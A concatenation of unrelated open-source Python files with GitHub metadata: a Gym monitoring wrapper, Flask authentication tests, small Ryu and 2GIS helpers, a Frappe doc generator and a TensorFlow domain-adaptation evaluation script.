write_upon_reset=False, uid=None, mode=None):
super(Monitor, self).__init__(env)
self.videos = []
self.stats_recorder = None
self.video_recorder = None
self.enabled = False
self.episode_id = 0
self._monitor_id = None
self.env_semantics_autoreset = env.metadata.get('semantics.autoreset')
self._start(directory, video_callable, force, resume,
write_upon_reset, uid, mode)
def _step(self, action):
self._before_step(action)
observation, reward, done, info = self.env.step(action)
done = self._after_step(observation, reward, done, info)
return observation, reward, done, info
def _reset(self):
self._before_reset()
observation = self.env.reset()
self._after_reset(observation)
return observation
def _close(self):
super(Monitor, self)._close()
# _monitor will not be set if super(Monitor, self).__init__ raises, this check prevents a confusing error message
if getattr(self, '_monitor', None):
self.close()
def set_monitor_mode(self, mode):
logger.info("Setting the monitor mode is deprecated and will be removed soon")
self._set_mode(mode)
def _start(self, directory, video_callable=None, force=False, resume=False,
write_upon_reset=False, uid=None, mode=None):
"""Start monitoring.
Args:
directory (str): A per-training run directory where to record stats.
video_callable (Optional[function, False]): function that takes in the index of the episode and outputs a boolean, indicating whether we should record a video on this episode. The default (for video_callable is None) is to take perfect cubes, capped at 1000. False disables video recording.
force (bool): Clear out existing training data from this directory (by deleting every file prefixed with "openaigym.").
resume (bool): Retain the training data already in this directory, which will be merged with our new data
write_upon_reset (bool): Write the manifest file on each reset. (This is currently a JSON file, so writing it is somewhat expensive.)
uid (Optional[str]): A unique id used as part of the suffix for the file. By default, uses os.getpid().
mode (['evaluation', 'training']): Whether this is an evaluation or training episode.
"""
if self.env.spec is None:
logger.warning("Trying to monitor an environment which has no 'spec' set. This usually means you did not create it via 'gym.make', and is recommended only for advanced users.")
env_id = '(unknown)'
else:
env_id = self.env.spec.id
if not os.path.exists(directory):
logger.info('Creating monitor directory %s', directory)
if six.PY3:
os.makedirs(directory, exist_ok=True)
else:
os.makedirs(directory)
if video_callable is None:
video_callable = capped_cubic_video_schedule
elif video_callable == False:
video_callable = disable_videos
elif not callable(video_callable):
raise error.Error('You must provide a function, None, or False for video_callable, not {}: {}'.format(type(video_callable), video_callable))
self.video_callable = video_callable
# Check on whether we need to clear anything
if force:
clear_monitor_files(directory)
elif not resume:
training_manifests = detect_training_manifests(directory)
if len(training_manifests) > 0:
raise error.Error('''Trying to write to monitor directory {} with existing monitor files: {}.
You should use a unique directory for each training run, or use 'force=True' to automatically clear previous monitor files.'''.format(directory, ', '.join(training_manifests[:5])))
self._monitor_id = monitor_closer.register(self)
self.enabled = True
self.directory = os.path.abspath(directory)
# We use the 'openai-gym' prefix to determine if a file is
# ours
self.file_prefix = FILE_PREFIX
self.file_infix = '{}.{}'.format(self._monitor_id, uid if uid else os.getpid())
self.stats_recorder = stats_recorder.StatsRecorder(directory, '{}.episode_batch.{}'.format(self.file_prefix, self.file_infix), autoreset=self.env_semantics_autoreset, env_id=env_id)
if not os.path.exists(directory): os.mkdir(directory)
self.write_upon_reset = write_upon_reset
if mode is not None:
self._set_mode(mode)
def _flush(self, force=False):
"""Flush all relevant monitor information to disk."""
if not self.write_upon_reset and not force:
return
self.stats_recorder.flush()
# Give it a very distiguished name, since we need to pick it
# up from the filesystem later.
path = os.path.join(self.directory, '{}.manifest.{}.manifest.json'.format(self.file_prefix, self.file_infix))
logger.debug('Writing training manifest file to %s', path)
with atomic_write.atomic_write(path) as f:
# We need to write relative paths here since people may
# move the training_dir around. It would be cleaner to
# already have the basenames rather than basename'ing
# manually, but this works for now.
json.dump({
'stats': os.path.basename(self.stats_recorder.path),
'videos': [(os.path.basename(v), os.path.basename(m))
for v, m in self.videos],
'env_info': self._env_info(),
}, f, default=json_encode_np)
def close(self):
"""Flush all monitor data to disk and close any open rending windows."""
if not self.enabled:
return
self.stats_recorder.close()
if self.video_recorder is not None:
self._close_video_recorder()
self._flush(force=True)
# Stop tracking this for autoclose
monitor_closer.unregister(self._monitor_id)
self.enabled = False
logger.info('''Finished writing results. You can upload them to the scoreboard via gym.upload(%r)''', self.directory)
def _set_mode(self, mode):
if mode == 'evaluation':
type = 'e'
elif mode == 'training':
type = 't'
else:
raise error.Error('Invalid mode {}: must be "training" or "evaluation"', mode)
self.stats_recorder.type = type
def _before_step(self, action):
if not self.enabled: return
self.stats_recorder.before_step(action)
def _after_step(self, observation, reward, done, info):
if not self.enabled: return done
if done and self.env_semantics_autoreset:
# For envs with BlockingReset wrapping VNCEnv, this observation will be the first one of the new episode
self._reset_video_recorder()
self.episode_id += 1
self._flush()
if info.get('true_reward', None): # Semisupervised envs modify the rewards, but we want the original when scoring
reward = info['true_reward']
# Record stats
self.stats_recorder.after_step(observation, reward, done, info)
# Record video
self.video_recorder.capture_frame()
return done
def _before_reset(self):
if not self.enabled: return
self.stats_recorder.before_reset()
def _after_reset(self, observation):
if not self.enabled: return
# Reset the stat count
self.stats_recorder.after_reset(observation)
self._reset_video_recorder()
# Bump *after* all reset activity has finished
self.episode_id += 1
self._flush()
def _reset_video_recorder(self):
# Close any existing video recorder
if self.video_recorder:
self._close_video_recorder()
# Start recording the next video.
#
# TODO: calculate a more correct 'episode_id' upon merge
self.video_recorder = video_recorder.VideoRecorder(
env=self.env,
base_path=os.path.join(self.directory, '{}.video.{}.video{:06}'.format(self.file_prefix, self.file_infix, self.episode_id)),
metadata={'episode_id': self.episode_id},
enabled=self._video_enabled(),
)
self.video_recorder.capture_frame()
def _close_video_recorder(self):
self.video_recorder.close()
if self.video_recorder.functional:
self.videos.append((self.video_recorder.path, self.video_recorder.metadata_path))
def _video_enabled(self):
return self.video_callable(self.episode_id)
def _env_info(self):
env_info = {
'gym_version': version.VERSION,
}
if self.env.spec:
env_info['env_id'] = self.env.spec.id
return env_info
def __del__(self):
# Make sure we've closed up shop when garbage collecting
self.close()
def get_total_steps(self):
return self.stats_recorder.total_steps
def get_episode_rewards(self):
return self.stats_recorder.episode_rewards
def get_episode_lengths(self):
return self.stats_recorder.episode_lengths
def detect_training_manifests(training_dir, files=None):
if files is None:
files = os.listdir(training_dir)
return [os.path.join(training_dir, f) for f in files if f.startswith(MANIFEST_PREFIX + '.')]
def detect_monitor_files(training_dir):
return [os.path.join(training_dir, f) for f in os.listdir(training_dir) if f.startswith(FILE_PREFIX + '.')]
def clear_monitor_files(training_dir):
files = detect_monitor_files(training_dir)
if len(files) == 0:
return
logger.info('Clearing %d monitor files from previous run (because force=True was provided)', len(files))
for file in files:
os.unlink(file)
def capped_cubic_video_schedule(episode_id):
if episode_id < 1000:
return int(round(episode_id ** (1. / 3))) ** 3 == episode_id
else:
return episode_id % 1000 == 0
def disable_videos(episode_id):
return False
monitor_closer = closer.Closer()
# This method gets used for a sanity check in scoreboard/api.py. It's
# not intended for use outside of the gym codebase.
def _open_monitors():
return list(monitor_closer.closeables.values())
def load_env_info_from_manifests(manifests, training_dir):
env_infos = []
for manifest in manifests:
with open(manifest) as f:
contents = json.load(f)
env_infos.append(contents['env_info'])
env_info = collapse_env_infos(env_infos, training_dir)
return env_info
def load_results(training_dir):
if not os.path.exists(training_dir):
logger.error('Training directory %s not found', training_dir)
return
manifests = detect_training_manifests(training_dir)
if not manifests:
logger.error('No manifests found in training directory %s', training_dir)
return
logger.debug('Uploading data from manifest %s', ', '.join(manifests))
# Load up stats + video files
stats_files = []
videos = []
env_infos = []
for manifest in manifests:
with open(manifest) as f:
contents = json.load(f)
# Make these paths absolute again
stats_files.append(os.path.join(training_dir, contents['stats']))
videos += [(os.path.join(training_dir, v), os.path.join(training_dir, m))
for v, m in contents['videos']]
env_infos.append(contents['env_info'])
env_info = collapse_env_infos(env_infos, training_dir)
data_sources, initial_reset_timestamps, timestamps, episode_lengths, episode_rewards, episode_types, initial_reset_timestamp = merge_stats_files(stats_files)
return {
'manifests': manifests,
'env_info': env_info,
'data_sources': data_sources,
'timestamps': timestamps,
'episode_lengths': episode_lengths,
'episode_rewards': episode_rewards,
'episode_types': episode_types,
'initial_reset_timestamps': initial_reset_timestamps,
'initial_reset_timestamp': initial_reset_timestamp,
'videos': videos,
}
def merge_stats_files(stats_files):
timestamps = []
episode_lengths = []
episode_rewards = []
episode_types = []
initial_reset_timestamps = []
data_sources = []
for i, path in enumerate(stats_files):
with open(path) as f:
content = json.load(f)
if len(content['timestamps'])==0: continue # so empty file doesn't mess up results, due to null initial_reset_timestamp
data_sources += [i] * len(content['timestamps'])
timestamps += content['timestamps']
episode_lengths += content['episode_lengths']
episode_rewards += content['episode_rewards']
# Recent addition
episode_types += content.get('episode_types', [])
# Keep track of where each episode came from.
initial_reset_timestamps.append(content['initial_reset_timestamp'])
idxs = np.argsort(timestamps)
timestamps = np.array(timestamps)[idxs].tolist()
episode_lengths = np.array(episode_lengths)[idxs].tolist()
episode_rewards = np.array(episode_rewards)[idxs].tolist()
data_sources = np.array(data_sources)[idxs].tolist()
if episode_types:
episode_types = np.array(episode_types)[idxs].tolist()
else:
episode_types = None
if len(initial_reset_timestamps) > 0:
initial_reset_timestamp = min(initial_reset_timestamps)
else:
initial_reset_timestamp = 0
return data_sources, initial_reset_timestamps, timestamps, episode_lengths, episode_rewards, episode_types, initial_reset_timestamp
# TODO training_dir isn't used except for error messages, clean up the layering
def collapse_env_infos(env_infos, training_dir):
assert len(env_infos) > 0
first = env_infos[0]
for other in env_infos[1:]:
if first != other:
raise error.Error('Found two unequal env_infos: {} and {}. This usually indicates that your training directory {} has commingled results from multiple runs.'.format(first, other, training_dir))
for key in ['env_id', 'gym_version']:
if key not in first:
raise error.Error("env_info {} from training directory {} is missing expected key {}. This is unexpected and likely indicates a bug in gym.".format(first, training_dir, key))
return first
|
{
"content_hash": "82b5070a5d0f1d0246fc645dfc1a12d9",
"timestamp": "",
"source": "github",
"line_count": 386,
"max_line_length": 302,
"avg_line_length": 39.432642487046635,
"alnum_prop": 0.6341239077590172,
"repo_name": "dianchen96/gym",
"id": "ca62135fa10726fd2a326d40740e1b91401e9bff",
"size": "15221",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "gym/wrappers/monitoring.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "461"
},
{
"name": "Python",
"bytes": "1225167"
},
{
"name": "Shell",
"bytes": "711"
}
],
"symlink_target": ""
}
|
from flask_testing import TestCase
import json
from tests import app, config, db, User
class TestRegLogin(TestCase):
'''
'''
@staticmethod
def init_db():
db.drop_all()
db.create_all()
def create_app(self):
app.config.from_object('config.TestingConfig')
return app
def setUp(self):
app = self.create_app()
self.app = app.test_client()
with app.app_context():
self.init_db()
self.reg_url = '/api/v1/auth/register'
self.login_url = '/api/v1/auth/login'
self.bucketlist_url = '/api/v1/bucketlists'
def tearDown(self):
db.session.remove()
db.session.close()
# os.unlink(app.config['SQLALCHEMY_DATABASE_URI'])
def test_db_initially_empty(self):
query = db.session.query(User).all()
assert not query
def test_home(self):
resp = self.app.get('/')
assert resp.status_code == 200
def test_username_field_required(self):
req = ({'password': 'No username'})
resp = self.app.post(self.reg_url, data=req)
# assert 'Missing data in required field' in str(resp.data)
assert resp.status_code == 422
def test_password_field_required(self):
req = ({'username': 'no_password'})
resp = self.app.post(self.reg_url, data=req)
#
assert resp.status_code == 422
def test__bad_short_required_input(self):
req = ({'username': 'tes ', 'password': ' '})
resp = self.app.post(self.reg_url, data=req)
#
assert resp.status_code == 400
def test_user_added_status(self):
# status code should be 201 for user created
req = ({'username': 'Adebayo', 'password': 'andela007'})
resp = self.app.post(self.reg_url, data=req)
assert resp.status_code == 201
def test_user_added_to_db_successfully(self):
# test user present in data base
req = ({'username': 'Adebayo', 'password': 'andela007'})
self.app.post(self.reg_url, data=req)
user = User.query.get(1)
assert user.username == "Adebayo"
def test_user_duplicate_status_code(self):
# status code should be 400 for an existing user
req = ({'username': 'Adebayo', 'password': 'andela007'})
self.app.post(self.reg_url, data=req)
resp = self.app.post(self.reg_url, data=req)
assert resp.status_code == 400
def test_user_login_status(self):
# get a status code of 200 when token is returne
req = ({'username': 'Adebayo', 'password': 'andela007'})
self.app.post(self.reg_url, data=req)
resp = self.app.post(self.login_url, data=req)
assert resp.status_code == 200
def test_status_code_user_login_with_invalid_details(self):
# status should return
req = ({'username': 'Adebayo', 'password': 'andela007'})
resp = self.app.post(self.login_url, data=req)
# json.loads(resp.data)
assert resp.status_code == 404
def test_user_can_access_auth_routes(self):
#
req = ({'username': 'Adebayo', 'password': 'andela007'})
self.app.post(self.reg_url, data=req)
token = json.loads((self.app.post(self.login_url, data=req)).data)
token = token.get('token')
resp = self.app.post(
self.bucketlist_url, data=req, headers={'Token': token})
assert resp.status_code != 401
def test_user_cannot_access_protected_route_with_invalid_token(self):
#
invalid_token = "eyJhbGciOiJIUzI1NiIsImlh\
dCI6MTQ5Mjg2MjcwOSwiZXhwIjoxNDkyOTQ5MTA5fQ.eyJpZCI6MX0.\
L5GNE_X7WspxUmLk0XKTpEJmS3XsFZfeFgdiQhLNRIo"
req = ({'username': 'Adebayo', 'password': 'andela007'})
resp = self.app.post(
self.bucketlist_url, data=req, headers={'Token': invalid_token})
assert resp.status_code == 401
def test_token_present(self):
req = ({'username': 'Adebayo', 'password': 'andela007'})
resp = self.app.post(
self.bucketlist_url, data=req)
assert resp.status_code == 401
def test_error_404_handler(self):
resp = self.app.get('/bucketlists')
assert resp.status_code == 404
|
{
"content_hash": "dc950be9603814862a3f9e4ecdee7629",
"timestamp": "",
"source": "github",
"line_count": 122,
"max_line_length": 76,
"avg_line_length": 34.89344262295082,
"alnum_prop": 0.5968992248062015,
"repo_name": "andela-oadeniran/bucket_list_api",
"id": "01ee2572e697c3d0cd806db93292b9aa7f7101fd",
"size": "4257",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_auth.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "36525"
}
],
"symlink_target": ""
}
|
class DgisError(Exception):
"""2Gis API error"""
def __init__(self, code, message, error_code):
self.code = code
self.message = message
self.error_code = error_code
def __str__(self):
return self.message
|
{
"content_hash": "98d95528b05d7ce962929f7a12f8f339",
"timestamp": "",
"source": "github",
"line_count": 10,
"max_line_length": 50,
"avg_line_length": 25,
"alnum_prop": 0.58,
"repo_name": "svartalf/python-aio2gis",
"id": "74b185a728f8173ef39e6c1a88a89778a0fca642",
"size": "250",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "aio2gis/client/exceptions.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "8256"
}
],
"symlink_target": ""
}
|
import logging
from abc import ABCMeta, abstractmethod
import six
from ryu.lib.packet import packet
LOG = logging.getLogger(__name__)
def packet_in_filter(cls, args=None):
def _packet_in_filter(packet_in_handler):
def __packet_in_filter(self, ev):
pkt = packet.Packet(ev.msg.data)
if not packet_in_handler.pkt_in_filter.filter(pkt):
LOG.debug('The packet is discarded by %s: %s' % (cls, pkt))
return
return packet_in_handler(self, ev)
pkt_in_filter = cls(args)
packet_in_handler.pkt_in_filter = pkt_in_filter
return __packet_in_filter
return _packet_in_filter
@six.add_metaclass(ABCMeta)
class PacketInFilterBase(object):
def __init__(self, args):
self.args = args
@abstractmethod
def filter(self, pkt):
pass
class RequiredTypeFilter(PacketInFilterBase):
def filter(self, pkt):
required_types = self.args.get('types') or []
for required_type in required_types:
if not pkt.get_protocol(required_type):
return False
return True
|
{
"content_hash": "6b21ad3d61ecdd4946015085799ba5d5",
"timestamp": "",
"source": "github",
"line_count": 41,
"max_line_length": 75,
"avg_line_length": 27.51219512195122,
"alnum_prop": 0.6223404255319149,
"repo_name": "yamada-h/ryu",
"id": "a84f7bb48be4f3e9fced8fe3be730aeb694f0883",
"size": "1759",
"binary": false,
"copies": "9",
"ref": "refs/heads/master",
"path": "ryu/lib/ofp_pktinfilter.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Erlang",
"bytes": "870216"
},
{
"name": "Python",
"bytes": "4257058"
},
{
"name": "Shell",
"bytes": "14336"
}
],
"symlink_target": ""
}
|
"""Automatically setup docs for a project
Call from command line:
bench frappe --setup_docs app docs_app path
"""
import os, json, frappe, markdown2, shutil
class setup_docs(object):
def __init__(self):
"""Generate source templates for models reference and module API
and templates at `templates/autodoc`
"""
self.app = frappe.get_hooks("autodoc").get("for_app")[0]
docs_app = frappe.get_hooks("autodoc").get("docs_app")[0]
hooks = frappe.get_hooks(app_name = self.app)
self.app_title = hooks.get("app_title")[0]
self.app_path = frappe.get_app_path(self.app)
path = frappe.get_app_path(docs_app, "www", "current")
print "Deleting current..."
shutil.rmtree(path, ignore_errors = True)
os.makedirs(path)
self.app_context = {
"app": {
"name": self.app,
"title": self.app_title,
"description": markdown2.markdown(hooks.get("app_description")[0]),
"version": hooks.get("app_version")[0],
"publisher": hooks.get("app_publisher")[0],
"github_link": hooks.get("github_link")[0],
}
}
# make home page
with open(os.path.join(path, "index.html"), "w") as home:
home.write(frappe.render_template("templates/autodoc/docs_home.html",
self.app_context))
# make folders
self.models_base_path = os.path.join(path, "models")
self.make_folder(self.models_base_path,
template = "templates/autodoc/models_home.html")
self.api_base_path = os.path.join(path, "api")
self.make_folder(self.api_base_path,
template = "templates/autodoc/api_home.html")
for basepath, folders, files in os.walk(self.app_path):
if "doctype" not in basepath:
if "doctype" in folders:
module = os.path.basename(basepath)
module_folder = os.path.join(self.models_base_path, module)
self.make_folder(module_folder,
template = "templates/autodoc/module_home.html",
context = {"name": module})
self.update_index_txt(module_folder)
if "doctype" in basepath:
parts = basepath.split("/")
#print parts
module, doctype = parts[-3], parts[-1]
if doctype not in ("doctype", "boilerplate"):
self.write_model_file(basepath, module, doctype)
elif self.is_py_module(basepath, folders, files):
self.write_modules(basepath, folders, files)
def is_py_module(self, basepath, folders, files):
return "__init__.py" in files \
and (not "/doctype" in basepath) \
and (not "/patches" in basepath) \
and (not "/change_log" in basepath) \
and (not "/report" in basepath) \
and (not "/page" in basepath) \
and (not "/templates" in basepath) \
and (not "/tests" in basepath) \
and (not "doctype" in folders)
def write_modules(self, basepath, folders, files):
module_folder = os.path.join(self.api_base_path, os.path.relpath(basepath, self.app_path))
self.make_folder(module_folder)
for f in files:
if f.endswith(".py"):
module_name = os.path.relpath(os.path.join(basepath, f),
self.app_path)[:-3].replace("/", ".").replace(".__init__", "")
module_doc_path = os.path.join(module_folder,
self.app + "." + module_name + ".html")
self.make_folder(basepath)
if not os.path.exists(module_doc_path):
print "Writing " + module_doc_path
with open(module_doc_path, "w") as f:
context = {"name": self.app + "." + module_name}
context.update(self.app_context)
f.write(frappe.render_template("templates/autodoc/pymodule.html",
context))
self.update_index_txt(module_folder)
def make_folder(self, path, template=None, context=None):
if not template:
template = "templates/autodoc/package_index.html"
if not os.path.exists(path):
os.makedirs(path)
index_txt_path = os.path.join(path, "index.txt")
print "Writing " + index_txt_path
with open(index_txt_path, "w") as f:
f.write("")
index_html_path = os.path.join(path, "index.html")
if not context:
name = os.path.basename(path)
if name==".":
name = self.app
context = {
"title": name
}
context.update(self.app_context)
print "Writing " + index_html_path
with open(index_html_path, "w") as f:
f.write(frappe.render_template(template, context))
def update_index_txt(self, path):
index_txt_path = os.path.join(path, "index.txt")
pages = filter(lambda d: (d.endswith(".html") and d!="index.html") \
or os.path.isdir(os.path.join(path, d)), os.listdir(path))
pages = [d.rsplit(".", 1)[0] for d in pages]
with open(index_txt_path, "r") as f:
index_parts = filter(None, f.read().splitlines())
if not set(pages).issubset(set(index_parts)):
print "Updating " + index_txt_path
with open(index_txt_path, "w") as f:
f.write("\n".join(pages))
def write_model_file(self, basepath, module, doctype):
model_path = os.path.join(self.models_base_path, module, doctype + ".html")
if not os.path.exists(model_path):
model_json_path = os.path.join(basepath, doctype + ".json")
if os.path.exists(model_json_path):
with open(model_json_path, "r") as j:
doctype_real_name = json.loads(j.read()).get("name")
print "Writing " + model_path
with open(model_path, "w") as f:
context = {"doctype": doctype_real_name}
context.update(self.app_context)
f.write(frappe.render_template("templates/autodoc/doctype.html",
context).encode("utf-8"))
|
{
"content_hash": "1d860b3e66844c1265d56d2366572998",
"timestamp": "",
"source": "github",
"line_count": 166,
"max_line_length": 92,
"avg_line_length": 31.987951807228917,
"alnum_prop": 0.6532956685499058,
"repo_name": "ashokrajbathu/secondrep",
"id": "a9e0f61b28d3e3b97b857c6f81ac0f529b9d003a",
"size": "5310",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "frappe/utils/setup_docs.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "237895"
},
{
"name": "HTML",
"bytes": "133550"
},
{
"name": "JavaScript",
"bytes": "1332932"
},
{
"name": "Python",
"bytes": "1103936"
},
{
"name": "Shell",
"bytes": "517"
}
],
"symlink_target": ""
}
|
import os, sys
import argparse
import types
import glob
import numpy as np
import pickle
import tensorflow as tf
import data
import model
from util import *
from learning import LearnerCls, LearnerDACls, LearnerClsSelf, LearnerConfPred
from learning import TempScalingCls as CalibratorCls
##TODO: clean-up tf options
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
#gpus = tf.config.experimental.list_physical_devices('GPU')
#tf.config.experimental.set_memory_growth(gpus[0], True)
def main(args):
# ## init a snapshot path
# os.makedirs(args.train.save_root, exist_ok=True)
# ## init logger
# sys.stdout = Logger(os.path.join(args.train.save_root, 'out'))
# ## print args
# print_args(args)
snap_list = glob.glob(args.snapshot_prefix + '_*')
print(snap_list)
print("# experiments = ", len(snap_list))
## init gpus
if not args.cpu:
print("##GPUs Available: ", len(tf.config.experimental.list_physical_devices('GPU')))
print()
## init datasets
print("## init datasets")
ds_src = data.MultiSourceDataset(
args.data.src,
args.aug_params,
batch_size=args.data.batch_size,
train_shuffle=True, train_aug=True, val_shuffle=True, val_aug=True,
color=False if args.data.img_size[2]==1 else True,
size=args.data.img_size[0],
sample_ratio=args.data.sample_ratio[0],
resize_pad=True if len(args.data.src)==1 and args.data.src[0]=='MNIST' and args.data.tar=='SVHN' else False, ##TODO: check if it's necessary
)
assert(len(args.aug_params) == 1) ##TODO
ds_tar = getattr(data, args.data.tar)(
root=os.path.join('data', args.data.tar.lower()),
batch_size=args.data.batch_size,
aug_list=args.aug_params[0],
train_shuffle=True, train_aug=True, val_shuffle=True, val_aug=True,
color=False if args.data.img_size[2]==1 else True,
size=args.data.img_size[0],
sample_ratio=args.data.sample_ratio[1])
ds_dom = data.DomainDataset(
data.MultiSourceDataset(
args.data.src,
args.aug_params,
batch_size=args.data.batch_size,
train_shuffle=True, train_aug=True, val_shuffle=True, val_aug=True, test_aug=True, # augment all splits
domain_id=1,
color=False if args.data.img_size[2]==1 else True,
size=args.data.img_size[0],
sample_ratio=args.data.sample_ratio[0],
resize_pad=True if len(args.data.src)==1 and args.data.src[0]=='MNIST' and args.data.tar=='SVHN' else False, ##TODO: check if it's necessary
),
getattr(data, args.data.tar)(
root=os.path.join('data', args.data.tar.lower()),
batch_size=args.data.batch_size,
aug_list=args.aug_params[0],
train_shuffle=True, train_aug=True, val_shuffle=True, val_aug=True, test_aug=True, # augment all splits
domain_id=0,
color=False if args.data.img_size[2]==1 else True,
size=args.data.img_size[0],
sample_ratio=args.data.sample_ratio[1]))
##TODO: redundant
ds_src_init = data.MultiSourceDataset(
args.data.src,
args.aug_params_init,
batch_size=args.data.batch_size,
train_shuffle=True, train_aug=True, val_shuffle=True, val_aug=True,
color=False if args.data.img_size[2]==1 else True,
size=args.data.img_size[0],##TODO
sample_ratio=args.data.sample_ratio[0],
resize_pad=True if len(args.data.src)==1 and args.data.src[0]=='MNIST' and args.data.tar=='SVHN' else False, ##TODO: check if it's necessary
)
assert(len(args.aug_params) == 1) ##TODO
ds_tar_init = getattr(data, args.data.tar)(
root=os.path.join('data', args.data.tar.lower()),
batch_size=args.data.batch_size,
aug_list=args.aug_params_init[0],##TODO
train_shuffle=True, train_aug=True, val_shuffle=True, val_aug=True,
color=False if args.data.img_size[2]==1 else True,
size=args.data.img_size[0],
sample_ratio=args.data.sample_ratio[1])
ds_dom_init = data.DomainDataset(
data.MultiSourceDataset(
args.data.src,
args.aug_params_init,
batch_size=args.data.batch_size,
train_shuffle=True, train_aug=True, val_shuffle=True, val_aug=True, test_aug=True, # augment all splits
domain_id=1,
color=False if args.data.img_size[2]==1 else True,
size=args.data.img_size[0],
sample_ratio=args.data.sample_ratio[0],
resize_pad=True if len(args.data.src)==1 and args.data.src[0]=='MNIST' and args.data.tar=='SVHN' else False, ##TODO: check if it's necessary
),
getattr(data, args.data.tar)(
root=os.path.join('data', args.data.tar.lower()),
batch_size=args.data.batch_size,
aug_list=args.aug_params_init[0], ##TODO
train_shuffle=True, train_aug=True, val_shuffle=True, val_aug=True, test_aug=True, # augment all splits
domain_id=0,
color=False if args.data.img_size[2]==1 else True,
size=args.data.img_size[0],
sample_ratio=args.data.sample_ratio[1]))
##TODO: redundant
ds_src_self = data.MultiSourceDataset(
args.data.src,
args.aug_params,
batch_size=args.data.batch_size,
train_shuffle=True, train_aug=True, val_shuffle=True, val_aug=True,
domain_id=1,
color=False if args.data.img_size[2]==1 else True,
size=args.data.img_size[0],
sample_ratio=args.data.sample_ratio[0],
resize_pad=True if len(args.data.src)==1 and args.data.src[0]=='MNIST' and args.data.tar=='SVHN' else False, ##TODO: check if...
)
assert(len(args.aug_params) == 1) ##TODO
ds_tar_self = getattr(data, args.data.tar)(
root=os.path.join('data', args.data.tar.lower()),
batch_size=args.data.batch_size,
aug_list=args.aug_params[0],
train_shuffle=True, train_aug=True, val_shuffle=True, val_aug=True,
domain_id=0,
color=False if args.data.img_size[2]==1 else True,
size=args.data.img_size[0],
sample_ratio=args.data.sample_ratio[1],
double_aug=True if args.training_type=='selfcon' else False,
)
print()
if args.merge_train_val:
ds_src.train = data.ChainLoader(ds_src.train, ds_src.val)
ds_dom.train = data.ChainLoader(ds_dom.train, ds_dom.val)
## collect stats
cls_error_init_list, cal_error_init_list = [], []
cls_error_list, cal_error_list = [], []
perf_epoch_list = []
for snap_root in snap_list:
##
## final student
##
## a student model
mdl_st_base = getattr(model, args.model.base)(num_class=args.model.n_labels, input_shape=args.model.img_size)
mdl_st = model.Student(args.model, mdl_st_base, ds_src_self, ds_tar_self, ideal=args.ideal)
## load the final student
mdl_st.model_base.load_weights(os.path.join(snap_root, 'model_params_final'))
## evaluate
learner = LearnerClsSelf(None, None, mdl_st, None)
error, ece, *_ = learner.test(ds_tar.test, ld_name=args.data.tar, verbose=True)
cls_error_list = np.append(cls_error_list, error.numpy())
cal_error_list = np.append(cal_error_list, ece)
print(f"[final, {args.snapshot_prefix}, cls error, n = {len(cls_error_list)}] mean = {np.mean(cls_error_list*100.0):.2f}%, std = {np.std(cls_error_list*100.0):.2f}%")
print(f"[final, {args.snapshot_prefix}, cal error, n = {len(cal_error_list)}] mean = {np.mean(cal_error_list*100.0):.2f}%, std = {np.std(cal_error_list*100.0):.2f}%")
##
## init student
##
## load the init student
mdl_fn_init = os.path.basename(glob.glob(os.path.join(snap_root, 'model_params_*init*.index'))[0])
mdl_fn_init = mdl_fn_init[:mdl_fn_init.rfind('_')]
if 'sourceonly' in mdl_fn_init:
mdl_st.model_base.load_weights(os.path.join(snap_root, mdl_fn_init+'_best'))
learner = LearnerClsSelf(None, None, mdl_st, None)
else:
assert('advtr' in mdl_fn_init)
## init a adv model
mdl_adv = getattr(model, args.train_advtr.model_advtr)(n_in=mdl_st.model_base.dim_feat)
mdl_st_adv = model.DAN(mdl_st.model_base, mdl_adv)
mdl_st_adv.load_weights(os.path.join(snap_root, mdl_fn_init+'_final'))
## init a learner
learner = LearnerDACls(None, mdl_st_adv)
## evaluate
error, ece, *_ = learner.test(ds_tar.test, ld_name=args.data.tar, verbose=True)
cls_error_init_list = np.append(cls_error_init_list, error.numpy())
cal_error_init_list = np.append(cal_error_init_list, ece)
print(f"[init, {args.snapshot_prefix}, cls error, n = {len(cls_error_init_list)}] mean = {np.mean(cls_error_init_list*100.0):.2f}%, std = {np.std(cls_error_init_list*100.0):.2f}%")
print(f"[init, {args.snapshot_prefix}, cal error, n = {len(cal_error_init_list)}] mean = {np.mean(cal_error_init_list*100.0):.2f}%, std = {np.std(cal_error_init_list*100.0):.2f}%")
##
## teacher performance at each step
##
if args.no_mid_results:
continue
cls_error_epoch_list, cal_error_epoch_list, prec_epoch_list, cov_epoch_list = [], [], [], []
for i_epoch in range(1, args.train.n_epochs): # ignore the last
## load
print("!!!! currently load best, but may load final later")
mdl_st.model_base.load_weights(os.path.join(snap_root, f'model_params_base_epoch_{i_epoch}_best'))
## cls/cal error
learner = LearnerClsSelf(None, None, mdl_st, None)
error, ece, *_ = learner.test(ds_tar.test, ld_name=args.data.tar, verbose=True)
print(error.numpy(), ece)
## precision/coverage
learner = LearnerConfPred(None, mdl_st.model_conf, mdl_st.model_base)
## set a constant
mdl_st.model_conf.T = tf.Variable(1.0 - args.train_conf.eps)
## test the model
prec, n_conf, n = learner.test(ds_tar.test, ld_name='tar', verbose=True)
cls_error_epoch_list.append(error.numpy())
cal_error_epoch_list.append(ece)
prec_epoch_list.append(prec.numpy())
cov_epoch_list.append(float(n_conf.numpy())/float(n))
perf_epoch_list.append({
'cls_error': np.array(cls_error_epoch_list),
'cal_error': np.array(cal_error_epoch_list),
'prec': np.array(prec_epoch_list),
'cov': np.array(cov_epoch_list)})
print()
## save
fn = args.snapshot_prefix + '.pk'
pickle.dump(
{
'cls_error_init': cls_error_init_list,
'cal_error_init': cal_error_init_list,
'cls_error': cls_error_list,
'cal_error': cal_error_list,
'perf_epoch': perf_epoch_list
},
open(fn, 'wb'))
def init_aug_params(aug, args):
aug_params = []
for a in aug:
if a == 'jitter':
aug_params.append([('jitter', {'brightness': 0.4, 'contrast': 0.4, 'saturation': 0.4})])
# elif a == 'shake':
